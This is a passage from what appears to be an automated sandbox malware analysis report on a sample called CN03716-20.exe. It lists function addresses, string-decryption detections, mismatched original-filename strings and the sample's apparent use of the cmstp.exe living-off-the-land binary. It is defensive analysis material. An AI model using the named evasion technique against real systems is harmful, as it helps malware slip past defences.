(x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Code function: 26_2_016EC148 26_2_016EC148 Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Code function: 26_2_016EE212 26_2_016EE212 Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Code function: 26_2_016EA758 26_2_016EA758 Source: C:\Program Files (x86)\Iw6qlizi\srmdufw81bmhwhwh.exe Code function: 26_2_016EF9B7 26_2_016EF9B7
 Found potential string decryption / allocating functions Show sources
 Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0447B150 appears 35 times
 Sample file is different than original file name gathered from version info Show sources
 Source: CN03716-20.exe Binary or memory string: OriginalFilename vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000000.252168488.000000000096F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000002.289598664.0000000001199000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000002.298584201.0000000007EA0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000002.298137296.0000000007980000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000003.275250102.0000000001236000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameEminem.dll< vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000002.298294757.0000000007B30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameButterFly.dll< vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs CN03716-20.exe Source: CN03716-20.exe, 00000000.00000002.298013346.00000000078D0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs CN03716-20.exe Source: CN03716-20.exe Binary or memory string: OriginalFilename vs CN03716-20.exe Source: CN03716-20.exe, 00000007.00000002.339108981.0000000000B1F000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamet07L.exe. vs CN03716-20.exe Source: CN03716-20.exe, 00000007.00000002.340963412.00000000019A5000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs CN03716-20.exe Source: CN03716-20.exe, 00000007.00000002.340495405.000000000189F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CN03716-20.exe
 Uses a Windows Living Off The Land Binaries (LOL bins) Show sources
 Source: unknown Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
 Yara signature match Show sources